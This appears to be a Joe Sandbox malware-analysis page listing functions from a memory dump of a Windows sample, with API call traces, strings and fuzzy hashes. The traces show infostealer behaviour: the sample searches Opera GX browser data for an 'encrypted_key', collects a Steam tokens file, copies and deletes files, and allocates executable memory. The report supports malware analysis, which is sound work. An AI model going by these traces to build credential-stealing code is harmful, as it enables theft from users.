Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: fc0fc6478cc04ac7729a73c39a2abb3da0582e410bd52a9742b4576dd14f0b99
Instruction ID: 91ca48195d30140e2c5e16c9bdc769b0c863c50d9730efaf7c5085c370d2cc52
Opcode Fuzzy Hash: fc0fc6478cc04ac7729a73c39a2abb3da0582e410bd52a9742b4576dd14f0b99
Instruction Fuzzy Hash: 40E0E6B5740344BFD7109B9B9C0DB9A76ADD786B55F101065F605D7150DAB0DAC48620

Function 0061D8E5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 314COMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

StrCmpCA.SHLWAPI(?,Opera GX,00647926,00647913,?,?,?), ref: 0061D918

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006239EE: GetFileAttributesA.KERNEL32(?,?,?,0061EA72,?,?,?), ref: 006239F5

Part of subcall function 006193A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 006193EE
Part of subcall function 006193A4: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0061947F

Strings

Opera GX, xrefs: 0061D908

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$AttributesFileFolderPath
String ID: Opera GX
API String ID: 729072150-3280151751
Opcode ID: d247fa1b880fc74fba6829f41bb4e6c665fbf57a8d7d2bbfd4578ce372491792
Instruction ID: 7831cf447780cf32e0b426fddd018ea5811950606114cedcf9b2aef772e5dc28
Opcode Fuzzy Hash: d247fa1b880fc74fba6829f41bb4e6c665fbf57a8d7d2bbfd4578ce372491792
Instruction Fuzzy Hash: A0C10832D0042AAACF90FBA9ED579CC7776AF04310F550429FE0477151DB31AFA98B96

Function 00617A3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00617B86,?), ref: 00617ABA

Strings

, xrefs: 00617A8D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: b650adeff8a262b448cebb1eb7f1c8b41f95256d929260c46954e2a077490b7b
Instruction ID: 1f5ef1583b0534293f59cb15f2b483dbdedd073813786462b3aa6f1a306b837b
Opcode Fuzzy Hash: b650adeff8a262b448cebb1eb7f1c8b41f95256d929260c46954e2a077490b7b
Instruction Fuzzy Hash: 1411667161820AABDB20CF98C584BEDB7F6FF04380F284458A541D6280E775ABC5EB60

Function 00624387 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 006243BD

Strings

xd, xrefs: 006243AB

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: xd
API String ID: 3080627654-1609501307
Opcode ID: 9a47443c7c0efc446b03d1e7628b8c79eccf8a201b5a0b1db60a30cdb0b2ff5d
Instruction ID: f6c023b9a8cf9bb3ef89033b32a4a650c410d03c465310aad92ce97a77caae38
Opcode Fuzzy Hash: 9a47443c7c0efc446b03d1e7628b8c79eccf8a201b5a0b1db60a30cdb0b2ff5d
Instruction Fuzzy Hash: 7EE07EB4D0521D9ECB41EFA899192EEBEF9AB49308F00916AC115F6240E3B446498BA5

Function 0062807F Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 006280C7
lstrcatA.KERNEL32(?), ref: 006280E5

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627D67
Part of subcall function 00627D20: FindFirstFileA.KERNEL32(?,?), ref: 00627D7E
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF4), ref: 00627D9F
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF8), ref: 00627DB9
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627DE0
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,006476B6), ref: 00627DF4
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E11
Part of subcall function 00627D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00627E3E
Part of subcall function 00627D20: lstrcatA.KERNEL32(?), ref: 00627E74
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B10), ref: 00627E86
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627E99
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B14), ref: 00627EAB
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627EBF

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E28
Part of subcall function 00627D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00627F78
Part of subcall function 00627D20: DeleteFileA.KERNEL32(?), ref: 00627FEC
Part of subcall function 00627D20: FindNextFileA.KERNEL32(?,?), ref: 0062804E
Part of subcall function 00627D20: FindClose.KERNEL32(?), ref: 00628062

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 4af6d9e13c9f96f8a262f8c5535eafa0277c64a64c9471b796b1d988c49696ad
Instruction ID: eece7a2d444882204b8a1da7c46d9eaed54d33e4e9e3daed89c5d00ad6d8cb0e
Opcode Fuzzy Hash: 4af6d9e13c9f96f8a262f8c5535eafa0277c64a64c9471b796b1d988c49696ad
Instruction Fuzzy Hash: 7C31C77680011CAFCF41EB64EC07EE977BBFF08705F440899B60493222EA795A958F91

Function 00628D06 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

lstrlenA.KERNEL32(?), ref: 00628D4D

Part of subcall function 00628BE6: CreateThread.KERNEL32(00000000,00000000,00628B15,?,00000000,00000000), ref: 00628C85
Part of subcall function 00628BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00628C8D

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00628D5D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 099b58caf882c432ea9ba9e67403ab2fced30b9e84ad6acfe382afc022b06d05
Instruction ID: e1f9910da0013bf9d05b42a8c9b025cc587826800844fc1d5f6b5138278a06e0
Opcode Fuzzy Hash: 099b58caf882c432ea9ba9e67403ab2fced30b9e84ad6acfe382afc022b06d05
Instruction Fuzzy Hash: 06012C32E0011AABCF40BBA9EC478CEBB7AAE01354F550564FB0077152DB316BA98AD5

Function 00620927 Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00620936
__CxxThrowException@8.LIBCMT ref: 00620951

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwmalloc
String ID:
API String ID: 3608276449-0
Opcode ID: a77800ba5291ed5d7edd272404c4db3619c8a39d0be7f784b58b3a6cd1d8882d
Instruction ID: 043c59aadbf70e685a83c96718ebca9b50fa683afcf55b398969a04f05fab92d
Opcode Fuzzy Hash: a77800ba5291ed5d7edd272404c4db3619c8a39d0be7f784b58b3a6cd1d8882d
Instruction Fuzzy Hash: AAD05E34D0061AB6EF50BB39EC0A4CA7B2A9E017B97105224B926A61D3DB70D9C18989

Function 00617728 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00617B48,?,?), ref: 0061777A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 006177A4

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 575c1ebbd4c13ee3492ad61a6d172c36f36b35d86f651f228bcb2a4974e1709f
Instruction ID: 417e9844d9b9f07d4fedd0fb9d373aaab97f0a3d99827190f35baa1057263103
Opcode Fuzzy Hash: 575c1ebbd4c13ee3492ad61a6d172c36f36b35d86f651f228bcb2a4974e1709f
Instruction Fuzzy Hash: D411BE76644B05ABD720CFB4C984BDBB7F5EB45714F28486DE61AD7390D274B980CB10

Function 00629C8D Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e206fba63f8fa4dfd8450f319b4fd0893d018e2bd6bcfe9a117a44f7baf8144b
Instruction ID: c1ad429e02a465729571bc57276154ce280efadd7a7efa9c62a2bdaa6d81b0fd
Opcode Fuzzy Hash: e206fba63f8fa4dfd8450f319b4fd0893d018e2bd6bcfe9a117a44f7baf8144b
Instruction Fuzzy Hash: CB511DB1911E106BDF617BFEA58AAF4B5D3AFF1314F18484BE1008E33697214E809E79

Function 00617B02 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14f4f6da6edc2a8816dd391f41fb17bf476ad407f8f6ae76aa5af5cd36eae65
Instruction ID: 66ffe500feafad20c7e1cef519198a79466a62761be6f91c12840be8928eed6c
Opcode Fuzzy Hash: b14f4f6da6edc2a8816dd391f41fb17bf476ad407f8f6ae76aa5af5cd36eae65
Instruction Fuzzy Hash: 84313AB5A086149FCF1ADF59D8408EDBBB3EF94710B28459AE415EB351DB309AC1CBC8

Function 00623A18 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c45041d6e30344e21e52717d3cadef9c78a61fc04e7b51a9a1c0a05d9c78f3e6
Instruction ID: 0865b3815bc43edcf3990be990f08dbeefbece50f106082ad2acc24e301b82d5
Opcode Fuzzy Hash: c45041d6e30344e21e52717d3cadef9c78a61fc04e7b51a9a1c0a05d9c78f3e6
Instruction Fuzzy Hash: BAF03071E1016DABDB15DF68EC509AEB7FDEB48300F0045BABA09D3251DA749F458F90

Function 006239EE Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0061EA72,?,?,?), ref: 006239F5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: db96e167758c86719d692c4c5199dab64ef4f5507061074b3608a60f48ca4f0e
Instruction ID: 5d83f7fd0d3d95b6d99abd56a2a4843bd6cbd23e15eb32dd507a0ea51070b6b6
